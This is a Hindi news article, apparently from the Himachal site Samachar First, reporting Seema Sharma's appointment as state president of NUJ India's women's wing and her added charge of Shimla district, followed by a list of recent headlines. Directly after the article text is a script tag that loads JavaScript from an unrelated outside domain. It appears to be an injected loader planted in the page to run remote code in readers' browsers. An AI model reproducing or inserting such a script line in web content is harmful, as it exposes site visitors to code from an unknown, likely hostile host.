Categories: हिमाचल

सीमा शर्मा को NUJ में मिली बड़ी जिम्मेदारी, महिला विंग की प्रदेश अध्यक्ष बनी

<p>वरिष्ठ पत्रकार सीमा शर्मा को नेशनल यूनियन ऑफ जर्नलिस्टस इंडिया (NUJ इंडिया) के महिला विंग की प्रदेश अध्यक्ष नियुक्त किया गया है। उनकी नियुक्ति एनयूजे इंडिया के प्रदेशाध्यक्ष रणेश राणा ने संगठन के राष्ट्रीय अध्यक्ष प्रज्ञानंद चौधरी ,राष्ट्रीय महामंत्री शिव कुमार अग्रवाल और राष्ट्रीय कोषाध्यक्ष सीमा किरण की सहमति से की है।</p>

<p>प्रदेश वरिष्ठ उपाध्यक्ष जोगिंद्र देव आर्य, जितेंद्र ठाकुर और मीडिया प्रभारी श्याम लाल पुंडीर ने बताया कि हम सभी जानते हैं कि महिला शक्ति भी मीडिया जगत में लंबे समय से कार्यरत है। इसीलिए उनको भी संगठन से जोड़ा जाना जरुरी है।</p>

<p>गौरतलब है कि हिमाचल में महिला पत्रकारों के उत्थान और विकास के लिए कोई भी संगठन कार्यरत नहीं है। इसीलिए अब एनयूजे इंडिया इसके लिए आगे आई है। उन्होंने कहा कि हिमाचल में मीडिया में कार्यरत बहुत सी महिलाएं अच्छा काम कर रही है। लेकिन अभी वो महिलाएं एनयूजे की सदस्य नहीं बनी है। अब सीमा शर्मा को यह जिम्मेदारी सौंपी गई है कि वह पूरे प्रदेश में पत्रकार जगत मे कार्यरत महिलाओं को संगठन से जोडेंगी और उनके हितों के लिए संघर्ष करेंगी।सीमा शर्मा को शिमला जिला एनयूजे इंडिया के प्रभारी का भी अतिरिक्त दायित्व सौंपा गया है ताकि शिमला जिला और उसके आठों विस क्षेत्र में मंडल स्तर पर इकाईयों का गठन हो सके।</p>

<p>वहीं, सीमा शर्मा ने अपनी नियुक्ति के बाद कहा कि उनको जो भी दायित्व सौंपा गया है उसको वह पूरी ईमानदारी और निष्ठा से निर्वहन करेंगी। प्रदेश में मीडिया के क्षेत्र में कार्यरत तमाम महिला पत्रकारों को संगठन के साथ जोड़ा जाएगा। शिमला जिला में एनयूजे की सदस्यता अभियान को आगे बढ़ाया जाएगा।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

बिझडी बाजार में कार और स्कूटी में टक्‍कर, मचा बवाल

  Hamirpur: उपमंडल बड़सर के बिझडी बाजार में उस समय अफरा तफरी का माहौल बन…

3 hours ago

Kangana Ranaut: सत्ता पाने के लिए देश के विभाजन से भी नहीं हिचकिचाते राहुल गांधी

  Mandi:खड्गे और जेपी नड्डा की पत्रवार के बीच मंडी से भाजपा सांसद और एक्‍ट्रेस…

3 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार को…

3 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

  Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार…

4 hours ago

Uttar Pradesh: जमानत पर रिहा दुष्कर्म के आरोपी ने पीड़िता की गोली मारकर हत्या की

UP: दुष्कर्म का आरोपी और जमानत पर जेल से बाहर आए एक व्यक्ति ने दुष्कर्म…

4 hours ago

पेंशनरों की मांगों पर मुख्यमंत्री को ज्ञापन, सुधार की गुहार

  Nahan/Hamirpur: राज्‍य कार्यकारिणी के आह्वान पर अपनी मांगों को पेंशनरों ने जिला मुख्‍यालयों में…

4 hours ago